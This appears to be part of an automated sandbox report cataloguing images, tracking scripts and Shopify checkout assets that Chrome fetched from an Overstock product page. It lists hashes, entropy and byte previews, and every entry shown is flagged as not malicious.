                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2794
                                                                                                                                                                                    Entropy (8bit):7.427743320542501
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:kIl/XflFRTzKggia/a/T+4oYNzb/gHpXBISwzzB0XdA:kIl/X1TOggiaS/T+mzbepXBISwzVadA
                                                                                                                                                                                    MD5:0EB43F4AE85DE3335E7491DFCF70440D
                                                                                                                                                                                    SHA1:8B19F3BA5FBE72FF02F8CF2B5740C47C43E587A7
                                                                                                                                                                                    SHA-256:E00E03824F7C6123842B363CA04A4EB38157F7C95EDDCEB63982108C85655E37
                                                                                                                                                                                    SHA-512:F0E719C8E73E9841C15EF101958344C7E250E070E240D205809CDB2B3FAE3123714B71583FA2CE0BF44D601A4E595F76556AE4760B2B8EB7DFF01AC1746258F3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_6baf8aa7-ff51-44b9-b3cc-308113fe4f5e.jpg?v=1729322977&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 R........*P.P.>1..C"!!...H ....e.Z.f...3.3....":c.............@. .3#j.x..]..P...f..........M...,J..vJu<.W.vE.-....{.+.Z... ....r$......8.KC......v..:.b.. ..5,.......,....b...dG...i$...\...H....?#.k.M.J8..$.L0`...g...TO_Y.....w..;ED......T....G8........ .=.RW..$.pE..........'N...KtB=c..y...I.z<....q..I..I..........;hS..n.A...3~#7...s...N?.1"...6.t....'W...lJK.r__.o7.....R[..u.a.`..en.wL#.....,....R|...G....(.q....m3.............k..iA...{..yh.....5.srB.V......A..%@sF.....c...\i....\...l^.DEQ*.@..&0.F&.)....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):337388
                                                                                                                                                                                    Entropy (8bit):5.608693782203336
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:24ozGbgBu2omk2639cM8Gp/t2Wgtu9BW24nO3:foccu2omegAE8
                                                                                                                                                                                    MD5:ACEDD59F05E7BB2E59488BEB4BA24752
                                                                                                                                                                                    SHA1:1D5CB9C2B92AF179AA727F9BE9918AA27DD564D5
                                                                                                                                                                                    SHA-256:1B6FB5648995C750C1ACBEACEE3AF63565618AE682C70B7A75570975645C3915
                                                                                                                                                                                    SHA-512:7D744FF18BD1BDC75D9D32F6A2FA077F0E57E5BA0642E799F54E746C8E5A82A33035B53E1E4036C00E01D56A7E7766F3DDFA88558C432DA515D4F3076125B828
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-HRLVQWRG93
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":14,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2457
                                                                                                                                                                                    Entropy (8bit):7.111189834443446
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxtdW6+B/YfBZdnC5ArzDqNjKFYvYoPYadmrzYOS1z4:NBIl/XrxtdW9/IfdnC5ArHqN2mw3LS1k
                                                                                                                                                                                    MD5:1060586202C53D19EA33652CC0FF6848
                                                                                                                                                                                    SHA1:CCDB6CEDF4270EF528B0E8B9BAECC88DF821FFA0
                                                                                                                                                                                    SHA-256:32092A91B1F5130F9E4CF179249A255406CA5EA67FC3C00EDFA07D22CFE4A1DD
                                                                                                                                                                                    SHA-512:2382C12B7E03CD338A75AF211185E74BF67D8BF6246E87C321079A444AB36C86DC5791E3A443C2B4B1AFD50E0115CBB1FE25291D7D1170ED8A4614D5ACF6A7C4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................6......E*.....@...$..6...`@.BM9u.....{h`..T*.Y.~6:....].4.P,.....x/...g....V........>t.v*R.p.p.....Z9...eT..&T.l\:.{...qD(..h._..ea.H...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2974
                                                                                                                                                                                    Entropy (8bit):7.486721774840136
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:nIl/XfltGVlq2x4KHY1VtubUYP9m8WNYZVyju0Hs9LAKMbgrXbVCpWb52j4aojZe:nIl/XnwLx44YtE9MNUmu0M9LQbgrXbA7
                                                                                                                                                                                    MD5:43504923D1343023C80309361E317B2E
                                                                                                                                                                                    SHA1:93F13A9538982A41BAAB21DB8B37CAF05ADA286A
                                                                                                                                                                                    SHA-256:C32C87867DEC4C4805AF4AFBB2C78266CAC207E2E96693F28074D79C2D1DAEC0
                                                                                                                                                                                    SHA-512:51FD62614F5B263EE9069A7EDB7723B9881B102FFC42A3E79FC88D7BDCE44633C9A5EB3AA693BEC434909D0AB74C6D02B40DB49FB2D18ECBEAAB8FF33D6192C8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_cbcd48b0-a705-4554-a3f8-e42e245bd862.jpg?v=1729325305&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....p%...*P.P.>1..B.!.}.D...P.:p...1.]s...S..-W..._..@~.~.{....x.G.....C..Y?.?.....~.........zS...&i..7..lJ{;...?@<........._..R..(...k...?.^f..|.|}........P....}C.+...........K...z...J&.d_Jq.0.....O.M/.H..#..g...Uf.........(..![a.F...%t.B..*..}}..9.h.M..{..T.Q..'..0....[..eeMc..w.d.(rO).....X..I......n.6....B\LwM....BK.p...$i....)...F....%... ...j/......k...0..m........8.Aj.stY.iu...S0:......pNZJNc)...z...N....EAb7.&..u.l..~C. .,_."..h.erz.....R.....J..6.....i; .xc.Y.k...B........1#..Q..@,.w..\..*.N*
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (27764)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):47216
                                                                                                                                                                                    Entropy (8bit):5.347541950508692
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:dgLivxJv6rqgLInXZZZx6+VWjq0Lui7A9GMUkrpBRAuME+nIFB6bpCTkN5UNtzUg:WLivLv6rLLInXZZZx6+VWu0LuisY+pbd
                                                                                                                                                                                    MD5:5A9B91D12FC14C146D04E6795BA043D5
                                                                                                                                                                                    SHA1:3ED1DD79AAE0C7EE43589A716F0CED6C52850F12
                                                                                                                                                                                    SHA-256:C27315945898DCA4F2A6D5317656C3FB3BB610060CFE4F13345D0DEAA9D987F4
                                                                                                                                                                                    SHA-512:898A4B81CA95D806432C8A7E005C2D15812C94A7D809603C5A8AFE1A4101DA3F2C0F3F5E3A820ECF7F7A14DFCDA01A9576430FE8480197766502B3A8E57859D7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://hrckdul0.micpn.com/p/js/1.js
                                                                                                                                                                                    Preview:!function(){var Sizzle=(function(e){var t,n,r,i,o,u,l,a,c,s,f,d,p,h,g,m,y,w,v,b="sizzle"+1*new Date,N=e.document,x=0,C=0,E=oe(),D=oe(),A=oe(),T=function(e,t){return e===t&&(f=!0),0},S={}.hasOwnProperty,L=[],I=L.pop,q=L.push,B=L.push,R=L.slice,$=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},k="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",P="[\\x20\\t\\r\\n\\f]",H="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",M="\\["+P+"*("+H+")(?:"+P+"*([*^$|!~]?=)"+P+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+H+"))|)"+P+"*\\]",F=":("+H+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+M+")*)|.*)\\)|)",O=new RegExp(P+"+","g"),j=new RegExp("^"+P+"+|((?:^|[^\\\\])(?:\\\\.)*)"+P+"+$","g"),z=new RegExp("^"+P+"*,"+P+"*"),G=new RegExp("^"+P+"*([>+~]|"+P+")"+P+"*"),U=new RegExp("="+P+"*([^\\]'\"]*?)"+P+"*\\]","g"),V=new RegExp(F),X=new RegExp("^"+H+"$"),J={ID:new
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3144
                                                                                                                                                                                    Entropy (8bit):7.526506627754546
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:kIl/Xfl/+dWCl+Tyvkwh2o+6WkDNXG8NUlCw6kJzdmINkXcq:kIl/XU8ClyyvLt+6WkZBUP6ktXqcq
                                                                                                                                                                                    MD5:2DF8217D8B1EFC4FEAE0D32601395098
                                                                                                                                                                                    SHA1:BD256E208060F7744CFA5B762B6E8203796B1859
                                                                                                                                                                                    SHA-256:5F687B980832D5F85A6B087D218D40E0D72B2A49BECD60D478FFAABEA6553A61
                                                                                                                                                                                    SHA-512:3964A5181BD5A677B80A2CF91A231CF0E136DC1C3004876994721AA5ACB0B5DCDA5BF2401592459AB85B5170286F892D78C858D0D91D069F7A4EEC84D1DA724F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_66941dc3-bcd0-4980-998b-454d05ca5653.jpg?v=1729323127&width=80
                                                                                                                                                                                    Preview:RIFF@...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....P%...*P.P.>1..C"!!..v. ....\..$.NWV.......~c..=....I...H......'......n8.DG..i.?|.....W...].@....{3;.g...w...?@z7...K..`.._.z..}-.I.K..?.I........?....yZ..yz.?.Vn...`...=...\~..I.. .YM.Az*.H&..q.x..............l......w...W.SY~..........G...W....Q......J%...4z.=...Bi..RU.G~+X5..e.>....E......1...x......9>....d..U.SLo.]|.esX8..5...ZeHi.....p.0E....y&...@..->Q<...[...}.9..Jx..7...g.....g..5.`S.....j.m....%%H...S.....Oo.1?|..}....^.U..<$.V.Q..O..".Q...C8n...F.~...j....K5..x.y..v:IC..w.M..ny...W{j.Y<..h
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:C source, ASCII text, with very long lines (50719)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):51014
                                                                                                                                                                                    Entropy (8bit):5.227893953210577
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:eU/u1oWnkxzKhWdBY2rJxgCrMZ45dJ+KIAlj6cizBzzJpUVstotL:Z/+3nsflM6IAV6yRtL
                                                                                                                                                                                    MD5:C187B684E58EEED09BFD813740AA2C9D
                                                                                                                                                                                    SHA1:994F80424D6FFFDAD04E7623CC2A9F966C07F5F4
                                                                                                                                                                                    SHA-256:444D5ED8666CF861B4380F713C3EE88C3C629107562AC5044C2936F47A1C72ED
                                                                                                                                                                                    SHA-512:240181C621779E795C5BC4A6E4C36EDED7C0BA258086F364903C21884F654F6302A83BDF6A40E8FAA8AC9AADB25BB7F9F0193C5C76A3FCB1226468EA6A77EC84
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:window.Criteo=window.Criteo||{};window.Criteo.oneTagConfig={partnerId:2364,visitEventEnabled:true,fpIdentifier:undefined,dynamic:!0,gumDomain:"gum.criteo.com",privateModeDetectionEnabled:true,blockedSteps:[],addClientSideSupportForId5:false,shouldFillPageId:false,enableOffsiteProjection:true};.!function(){"use strict";function v(e,t){var n=null==(n=window.Criteo)?void 0:n.oneTagConfig;return null!=(n=n&&n[e])?n:t}var I,T="5.29.0",u=((P=I=I||{})[P.None=0]="None",P[P.Cookie=1]="Cookie",P[P.LocalStorage=2]="LocalStorage",P[P.Library=3]="Library",o.checkLocalStorageIsWritable=function(){try{var e;return window.localStorage?(e="criteo_localstorage_check",window.localStorage.setItem(e,e),window.localStorage.removeItem(e),!0):!1}catch(e){return!1}},o.checkCookiesAreWritable=function(){var e=new o("criteo_write_test",1e4),t=(e.setValueWithNoDomain("1"),"1"===e.cookieValue);return e.removeWithNoDomain(),t},o.prototype.setCookieRead=function(){this.isCookieRead=!0},o.prototype.setValue=function(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (22272)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):22273
                                                                                                                                                                                    Entropy (8bit):5.400660167493515
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:MZ6ZDMjT0ve3sj/fPs0hk66xtiIzg+EZZ+F2XMHe4mDz2iWoLdcIAudyPxEdKGp5:MoZDMjT0m3sj/fVhkBtib+hUMHe4mH/v
                                                                                                                                                                                    MD5:BDA4126BE2F960B9213BE97541A4E5AC
                                                                                                                                                                                    SHA1:CD3F67EB24AD80EA46DCE1482EC3805EE89D8400
                                                                                                                                                                                    SHA-256:E527B2F39205633FEA53C6BEC0B2065DF82C4114F56F4E950BF9A114867F1FBB
                                                                                                                                                                                    SHA-512:1E7C80F52100F7C6BC09FF27CC969B18232D20C279E3215CD9B6A29633E4191A57AF4363193EAF15AD9BCAFCA1A71BED09DD065035D136C43859D6D66D0E6234
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/component-ShopPayVerificationSwitch.BlUYB-_q.js
                                                                                                                                                                                    Preview:import{hc as He,o as ue,cH as ge,r as ze,m as Pe,l as te,T as V,cI as de,bw as We,bB as Ge,bF as ve,h as B,q as b,w as we,a as C,eC as qe,A,hd as Ke,he as je,y as g,ae as me,hf as Ye,ab as Ce,dg as Qe,hg as Je,hh as Xe,bc as Ie,hi as Me,d as ae,br as ie,aO as be,hj as Le,hk as X,hl as Ae,f9 as ce,hm as ee,hn as W,ho as De,hp as q,hq as ne,hr as le,hs as Ze,ht as oe,hu as Ne,hv as et,cE as U,v as tt,bO as nt,e as ot,c0 as st,cx as rt,cB as at,hw as it,hx as xe,hy as ct,hz as ut,by as dt,al as lt,hA as ye}from"./app.DfgMZONA.js";import{M as R}from"./DeliveryMethodSelectorSection.HuQ_vE9w.js";import{u as ht,p as G,S as $,A as J,a as ft,M as Te,b as pt}from"./publishMessage.CX0yXme-.js";import{a as mt,u as yt,U as Se}from"./useUnauthenticatedErrorModal.AwvSMfsF.js";import{u as St,a as Ue,P as Et,C as _t,i as se,b as kt,c as Z,d as he,e as Ve,f as fe,g as gt,A as Pt,h as vt,r as wt,R as Ct,j as It}from"./index.BImg1G4g.js";import"./LegacyVaultedShippingMethods.CLlWtWZU.js";import"./Rollup.B
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):70943
                                                                                                                                                                                    Entropy (8bit):3.7777810238413783
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:WIcIOJ5DykjQG2fek0x1LJhZpMJQ+z+IoiorXAUWB5PL1fwcZuRwOv6ksHnD1Mjk:/qLjifezFJwUgCcZtnZX7v
                                                                                                                                                                                    MD5:05532E4294ECE62EE9AF0B01F9444A1A
                                                                                                                                                                                    SHA1:D9B3B7593B8AA4C7187A38D04CCF13763C63BF93
                                                                                                                                                                                    SHA-256:E2DE817BA2DC98107B6D5BE63656A8392AB9A564E9D422D4CD909997B6C93CB0
                                                                                                                                                                                    SHA-512:DAD1B41C683EFA2C7896B2C400C4A036C0FF1287AA22647C7823FF72A1169DF97DF9C3310C5DD650C4204FDCD6D57EBD780F177F2F9DBA0F344C5DCBB07D5BF2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="805" height="447" viewBox="0 0 805 447" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_6273_16330)">.<path d="M41.1778 142.026H63.0178V148.266H33.1378V120.266H62.5778V126.506H41.1778V131.106H58.8178V137.066H41.1778V142.026ZM78.2225 125.226C86.6625 125.226 91.7025 128.986 91.7025 135.826V144.066C91.7025 145.666 91.9825 146.986 92.6625 148.266H84.6625C84.2225 147.586 83.9025 146.746 83.9025 145.986V145.946C82.2225 147.706 79.1425 149.066 75.2225 149.066C70.5425 149.066 64.5825 147.226 64.5825 141.546C64.5825 135.866 70.5425 134.026 75.2225 134.026C79.1425 134.026 82.2225 135.386 83.9025 137.186V135.746C83.9025 132.386 81.4225 130.786 76.5825 130.786C73.9425 130.786 71.3425 131.146 68.6225 132.506L66.8225 127.506C69.8225 126.066 74.3825 125.226 78.2225 125.226ZM84.0625 141.746V141.306C82.5425 139.186 79.7425 138.626 77.4625 138.626C75.2225 138.626 72.2225 139.186 72.2225 141.546C72.2225 143.906 75.2225 144.466 77.4625 144.466C79.7425 144.466 82.5425 1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4413)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4414
                                                                                                                                                                                    Entropy (8bit):5.085793650664478
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:K7kM4797A7GK9VwMN6FLUMgeJR7oh9wQ8z8+4eJN9qpyqddC0mx:RBsCK9VwMNSLUMgcuh9YI+4EN9ITbAx
                                                                                                                                                                                    MD5:C404893E8DB5BC1C3650EC1FCF674046
                                                                                                                                                                                    SHA1:B12072A0A3A5F82DECFBDA8F98D582B569EDD157
                                                                                                                                                                                    SHA-256:DAAA0C72017B3EB7959CFF3801DEFB82C705B9D63827F7F0A2965E160DF70941
                                                                                                                                                                                    SHA-512:4ABD297D690ADA1616C3FFC8663E38A2A76CAB56B55FC28B0FB211918EF51FDE11EFA2B5CEEB1AD05B32295F435731BBF51074EFA0C3F1613F07FA0C5DC44878
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/OnePage.BL1uXB7_.css
                                                                                                                                                                                    Preview:.bAwqP{word-break:break-word}.sYMP2{line-height:1}.sYMP2:not(.aPplN):hover{background-color:var(--x-default-color-background-subdued)}.N5SeL{border-radius:var( --x-primary-button-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) )}.fdTMm{display:inline-block}[dir=ltr] .ekZTm{padding-left:var(--x-spacing-small-400)}[dir=rtl] .ekZTm,[dir=ltr] .ekZTm{padding-right:var(--x-spacing-small-400)}[dir=rtl] .ekZTm{padding-left:var(--x-spacing-small-400)}[dir=ltr] .UmHzB{padding-left:var(--x-spacing-small-300)}[dir=rtl] .UmHzB,[dir=ltr] .UmHzB{padding-right:var(--x-spacing-small-300)}[dir=rtl] .UmHzB{padding-left:var(--x-spacing-small-300)}[dir=ltr] .JPhUL{padding-left:var(--x-spacing-base)}[dir=rtl] .JPhUL,[dir=ltr] .JPhUL{padding-right:var(--x-spacing-base)}[dir=rtl] .JPhUL{padding-left:var(--x-spacing-base)}._7k6aq{padding-top:var(--x-spacing-small-400);padding-bottom:var(--x-spacing-small-400)}.CmqN5{padding-top:var(--x-spacing-small-300);padding-bottom:var(--x-spacing
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):44
                                                                                                                                                                                    Entropy (8bit):4.397407619700922
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H+uZskKGuKEnxCm:euZskTuKEEm
                                                                                                                                                                                    MD5:2303B9AF2875BA5A7FABB0DD11D5ADB9
                                                                                                                                                                                    SHA1:48D6954E851F47708181A2CD71C93FC7AFD664FA
                                                                                                                                                                                    SHA-256:EEB84F83B36B17B1C81E3DB71E4019F84ECEEC90B64175D6A5BBBB5F4FB6947E
                                                                                                                                                                                    SHA-512:0E92FB26BD161F01682744EC0587E8613D54A33365A4EE83CD63C05B30C1B9E73071AB16D5D508038EED1F1A81D81D115B0364127EC3FD57180FA5E66C503E99
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAnMl5DOrngEaBIFDZFhlU4SEAnTBeBq957POxIFDQPwgdo=?alt=proto
                                                                                                                                                                                    Preview:CgkKBw2RYZVOGgAKFAoSDQPwgdoaBAgJGAEaBQiaARgC
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):94798
                                                                                                                                                                                    Entropy (8bit):3.716220284965788
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:vR8ZV9N5OSCtueoPKd+3yHm17+ZV9N5OSCtueoPKd+3yHm17fwz:94T
                                                                                                                                                                                    MD5:D8716B59D1B30B018F00E26D949878CD
                                                                                                                                                                                    SHA1:01129C4961F1B2D7FD95B726AC59EEFE220002A5
                                                                                                                                                                                    SHA-256:CE879E9E2187EC88F3CFC3D5A2A2EEE01A5B6255CAED7E943D723D63C7007CBF
                                                                                                                                                                                    SHA-512:CED43482F3C7DEB46641C8D82972D1CF0255C5485DC83056FFA365BDA0D9E1ED70C451C79365E4771A19D8212C8EA19E7CD4324839263A8AD3C3B778AD4E6163
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="910" height="60" viewBox="0 0 910 60" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect width="910" height="60" fill="#F5BB5C"/>.<path d="M185.354 22.178C189.862 22.178 192.298 25.062 192.298 29.122V38.25H186.782V29.486C186.782 27.47 185.634 26.294 183.534 26.294C181.714 26.294 180.146 27.162 178.97 29.066V38.25H173.454V22.738V17.53H178.97V23.074V25.202C180.286 23.27 182.582 22.178 185.354 22.178ZM205.253 38.894C199.009 38.894 195.089 35.674 195.089 30.494C195.089 25.286 199.009 22.122 205.253 22.122C211.469 22.122 215.389 25.286 215.389 30.494C215.389 35.674 211.469 38.894 205.253 38.894ZM205.253 34.638C208.081 34.638 210.125 33.21 210.125 30.494C210.125 27.75 208.081 26.35 205.253 26.35C202.425 26.35 200.381 27.75 200.381 30.494C200.381 33.21 202.425 34.638 205.253 34.638ZM242.628 22.178C247.108 22.178 249.236 25.146 249.236 29.122V38.25H243.748V29.43C243.748 27.498 242.74 26.294 240.696 26.294C238.932 26.294 237.56 27.246 236.552 29.066V29.122V35.366L236.58 38.25H231
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (40455)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):40532
                                                                                                                                                                                    Entropy (8bit):5.39831659265177
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:sFmkuGgWzWxZTWLbAwHfJLnmITcGS5Y2xnCZqCYm:dkrgWKHqLkwtnPQGS5dnkmm
                                                                                                                                                                                    MD5:D57FA8D12FCB57E7DA82519D6EF0F2B5
